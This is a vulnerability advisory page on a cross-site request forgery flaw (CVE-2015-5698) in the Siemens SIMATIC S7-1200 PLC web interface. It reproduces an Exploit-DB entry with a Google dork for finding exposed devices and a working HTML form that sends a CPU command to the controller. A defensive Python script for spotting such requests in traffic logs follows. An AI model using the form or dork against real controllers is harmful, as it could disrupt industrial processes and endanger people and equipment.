vendor: SIMATIC S7-1200 CPU family
by: t4rkd3vilz, Jameel Nabbo
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: SIMATIC S7-1200 CPU family
Affected Version From: All versions prior to V4.1.3
Affected Version To: V4.1.3
Patch Exists: YES
Related CVE: CVE-2015-5698
CPE: h:siemens:simatic_s7-1200_cpu_family
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

Siemens SIMATIC S7-1200 CPU – Cross-Site Request Forgery

A Cross-Site Request Forgery (CSRF) vulnerability exists in the Siemens SIMATIC S7-1200 CPU family, all versions prior to V4.1.3, which could allow an attacker to send malicious requests to the target system. An attacker can craft a malicious HTML form that is submitted to the target system, which then executes the request without the user's knowledge or consent.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version.

Exploit-DB raw data:

# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015-5698

# 1. Proof of Concept

<form method="POST" action="http://targetIp/CPUCommands">
    <input name="PriNav" value="Start">
    <input type="submit" value="Go!">
</form>
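
On devices that have not yet been updated, requests of the shape shown in the proof of concept can be recognised in web proxy or packet-capture records by comparing the Origin or Referer header with the Host header. The following Python is an added example, not part of the original advisory or exploit entry; the function names, the sample requests and the 192.0.2.x and example.test values are constructed, and only the /CPUCommands path comes from the page.

```python
from urllib.parse import urlsplit

# Path taken from the PoC form on this page; any other state-changing
# endpoints on the device are an assumption the operator would add.
STATE_CHANGING_PATHS = {"/CPUCommands"}

def _origin_of(url):
    """Return (scheme, host, port) for a URL, or None if it is unusable."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    port = port or (443 if parts.scheme == "https" else 80)
    return (parts.scheme, parts.hostname.lower(), port)

def classify(method, path, headers, scheme="http"):
    """Return 'ignore', 'same-origin', 'cross-site' or 'unverifiable'."""
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() != "POST" or urlsplit(path).path not in STATE_CHANGING_PATHS:
        return "ignore"
    target = _origin_of(f"{scheme}://{h.get('host', '')}")
    # Browsers send Origin on cross-origin form POSTs; Referer is the fallback.
    source_hdr = h.get("origin") or h.get("referer")
    if not source_hdr or target is None:
        return "unverifiable"  # no provenance header: cannot prove same-origin
    source = _origin_of(source_hdr)
    if source is None:  # e.g. "Origin: null" from sandboxed or file:// pages
        return "cross-site"
    return "same-origin" if source == target else "cross-site"

# Constructed sample requests (documentation address range, not real devices).
SAMPLES = [
    ("POST", "/CPUCommands", {"Host": "192.0.2.10", "Origin": "http://192.0.2.10"}),
    ("POST", "/CPUCommands", {"Host": "192.0.2.10", "Origin": "http://example.test"}),
    ("POST", "/CPUCommands", {"Host": "192.0.2.10", "Referer": "http://example.test/page.html"}),
    ("POST", "/CPUCommands", {"Host": "192.0.2.10", "Origin": "null"}),
    ("POST", "/CPUCommands", {"Host": "192.0.2.10"}),
    ("GET", "/Portal/Portal.mwsl", {"Host": "192.0.2.10"}),
]

def run_samples():
    return [classify(m, p, h) for m, p, h in SAMPLES]

if __name__ == "__main__":
    for sample, verdict in zip(SAMPLES, run_samples()):
        print(f"{verdict:13} {sample[0]} {sample[1]} {sample[2]}")
```

A 'cross-site' verdict on a POST to /CPUCommands is the signal to alert on; 'unverifiable' requests carry no provenance header and need review against known engineering-station traffic.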